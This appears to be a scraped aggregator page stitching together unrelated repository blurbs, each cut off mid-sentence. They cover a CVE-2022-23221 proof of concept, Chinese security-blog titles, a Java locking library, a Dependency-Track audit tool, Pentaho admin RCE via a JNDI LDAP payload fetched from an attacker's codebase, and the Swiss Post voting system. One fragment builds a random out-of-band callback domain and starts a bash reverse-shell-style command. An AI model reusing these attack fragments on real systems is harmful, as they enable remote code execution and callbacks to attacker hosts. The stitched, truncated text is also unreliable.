CVE-2022-23221

https://exploit-poc.com

exploit-poc 关于“亚信安全公众号”漏洞通告的分析 安全运行goby Attack surface mapping CVE-2022-23221 POC 关于知道创宇的运营模式分析 Java代码审计 基于web NC 通用渗透无回显解决 # 随机域名 selfradomServer = str(randomrandint(1, 999999999999)) + 'rce51pwncom' # bash -c '0<&

Synchro Task SynchroTask is a lightweight library which helps to synchronize Java routines in distributed environments Synchronization is one of the most important parts in software development Programming languages offer a wide range of options to work with locks and concurrency In Java, developers can choose between low-level features, such as synchronized or methods li

Audit Dependency-Track findings and policy violations via policy as code

dtapac Audit Dependency-Track findings and policy violations via policy as code Consider this project to be a proof-of-concept It is not very sophisticated, but it gets the job done Try it in a test environment first Do not skip this step, do not run it in production without prior testing! Introduction Dependency-Track offers a fairly sophisticated auditing workflow for

Pentaho community edition high-priv RCE Different ways to achieve code execution using an admin account (in practice the Manage Data Sources role is enough although none of the default credentials have this role) JNDI The software supports JNDI data sources and putting an ldap url as database name is sufficient to have the attackers payload fetched from a remote codebase (same

Swiss Post Voting System The Swiss Post Voting System is a return code-based remote online voting system that provides individual verifiability, universal verifiability, and vote secrecy Individual verifiability: allow a voter to convince herself that the system correctly registered her vote Universal verifiability: allow an auditor to check that the election outcome correspo